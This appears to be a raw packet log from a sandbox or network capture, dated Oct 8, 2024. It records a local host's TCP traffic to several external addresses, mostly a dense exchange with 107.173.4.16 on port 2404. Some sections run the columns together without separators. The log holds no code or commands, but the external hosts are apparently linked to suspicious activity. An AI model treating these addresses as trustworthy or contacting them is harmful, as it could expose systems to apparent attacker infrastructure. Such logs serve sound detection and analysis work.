                                                                          Oct 8, 2024 00:40:25.282197952 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282205105 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.282233953 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282248974 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282278061 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.282335997 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282346010 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.282392025 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282419920 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.282432079 CEST44349981185.26.107.57192.168.2.10
                                                                          Oct 8, 2024 00:40:25.283123016 CEST49981443192.168.2.10185.26.107.57
                                                                          Oct 8, 2024 00:40:25.980727911 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:25.988403082 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:25.988488913 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:25.993362904 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:26.000737906 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.545489073 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.595153093 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:26.671902895 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.676630020 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:26.683533907 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.683594942 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:26.691123009 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.849716902 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:26.851015091 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:26.858671904 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.039186001 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.059272051 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:40:27.066051006 CEST8049983178.237.33.50192.168.2.10
                                                                          Oct 8, 2024 00:40:27.067260981 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:40:27.067260981 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:40:27.074428082 CEST8049983178.237.33.50192.168.2.10
                                                                          Oct 8, 2024 00:40:27.079469919 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.191446066 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.193059921 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.199420929 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.201452971 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.205734015 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.212696075 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.235728979 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.725028992 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.766990900 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.786236048 CEST8049983178.237.33.50192.168.2.10
                                                                          Oct 8, 2024 00:40:27.786302090 CEST4998380192.168.2.10178.237.33.50
                                                                          Oct 8, 2024 00:40:27.822200060 CEST499822404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.828880072 CEST240449982107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.851888895 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.856372118 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.862597942 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:27.862766027 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:27.869788885 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027129889 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027178049 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027189970 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027237892 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.027287960 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027301073 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027311087 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027323008 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027342081 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.027370930 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.027473927 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027487040 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.027520895 CEST499842404192.168.2.10107.173.4.16
Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Oct 8, 2024 00:40:28.028116941 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.028129101 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.028140068 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.028172016 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.028202057 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.033971071 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.079495907 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.110049009 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110065937 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110078096 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110192060 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.110493898 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110506058 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110519886 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.110547066 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.110574007 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.111229897 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.111263990 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.111275911 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.111321926 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.112178087 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.112190962 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.112204075 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.112226963 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.112260103 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.112938881 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.112951040 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.112958908 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.113035917 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.113806963 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.113820076 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.113831997 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.113848925 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.113862038 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.114623070 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.114651918 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.114665031 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.114697933 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.115411997 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.115472078 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.192501068 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192533016 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192543983 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192554951 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192589998 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.192632914 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.192919016 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192931890 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192943096 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.192971945 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.193041086 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.193088055 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.193728924 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.193739891 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.193753004 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.193784952 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.193794966 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.193835020 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.194468021 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.194494963 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.194504976 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.194544077 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.194619894 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.195017099 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.195409060 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.195420027 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.195432901 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.195475101 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.195528984 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.195640087 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.196358919 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.196371078 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.196382046 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.196393967 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.196412086 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.196445942 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.197110891 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197123051 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197134972 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197146893 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197160959 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.197192907 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.197875977 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197937965 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197949886 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.197974920 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.198172092 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.198211908 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.198731899 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.198784113 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.198796034 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.198827982 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.198904037 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.198940992 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.199609995 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.199620962 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.199631929 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.199660063 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.199700117 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.199738979 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.200509071 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.200520992 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.200532913 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.200567007 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.251343966 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275315046 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275327921 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275341034 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275397062 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275399923 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275408030 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275418997 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275432110 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275434017 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275530100 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275747061 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275758028 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275768042 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275779009 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275784016 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275790930 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275800943 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275811911 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275819063 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275824070 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275835037 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275840998 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.275847912 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.275876999 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.276012897 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276024103 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276036024 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276046991 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276053905 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.276060104 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276068926 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.276072025 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.276093960 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277267933 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277309895 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277358055 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277369976 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277443886 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277455091 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277463913 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277476072 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277478933 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277507067 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277570963 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277581930 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277591944 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277602911 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277612925 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277622938 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277626991 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277633905 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277646065 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277652025 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277681112 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277774096 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277786016 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277796030 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277806044 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.277828932 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.277852058 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278151989 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278165102 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278176069 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278187037 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278198957 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278199911 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278209925 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278222084 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278228045 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278255939 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278400898 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278450012 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278475046 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278486013 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278497934 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278510094 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.278518915 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.278548002 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.279261112 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279273987 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279284954 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279294968 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279304981 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279316902 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279329062 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279329062 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.279340029 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279354095 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279355049 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.279365063 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279372931 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.279376984 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279397011 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.279397964 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.279444933 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.280014992 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.280028105 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.280039072 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.280059099 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.280255079 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.281025887 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.282896996 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.282908916 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.282922029 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.282959938 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.283082008 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.283092976 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.283102989 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.283127069 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.283150911 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.306863070 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.357862949 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357891083 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357902050 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357959986 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357970953 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357983112 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.357994080 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358005047 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358020067 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358037949 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358169079 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358180046 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358191013 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358201981 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358212948 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358223915 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358234882 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358238935 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358264923 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358408928 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358421087 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358432055 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358442068 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358452082 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358453035 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358464003 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358469963 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358474970 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358483076 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358509064 CEST  49984        2404       192.168.2.10  107.173.4.16
Oct 8, 2024 00:40:28.358861923 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358874083 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358886003 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358896971 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358906984 CEST  2404         49984      107.173.4.16  192.168.2.10
Oct 8, 2024 00:40:28.358922005 CEST  49984        2404       192.168.2.10  107.173.4.16
                                                                          Oct 8, 2024 00:40:28.358944893 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.358957052 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.358964920 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.358968019 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.358978033 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.358985901 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.358989954 CEST240449984107.173.4.16192.168.2.10
                                                                          Oct 8, 2024 00:40:28.358999968 CEST499842404192.168.2.10107.173.4.16
                                                                          Oct 8, 2024 00:40:28.359000921 CEST240449984107.173.4.16192.168.2.10
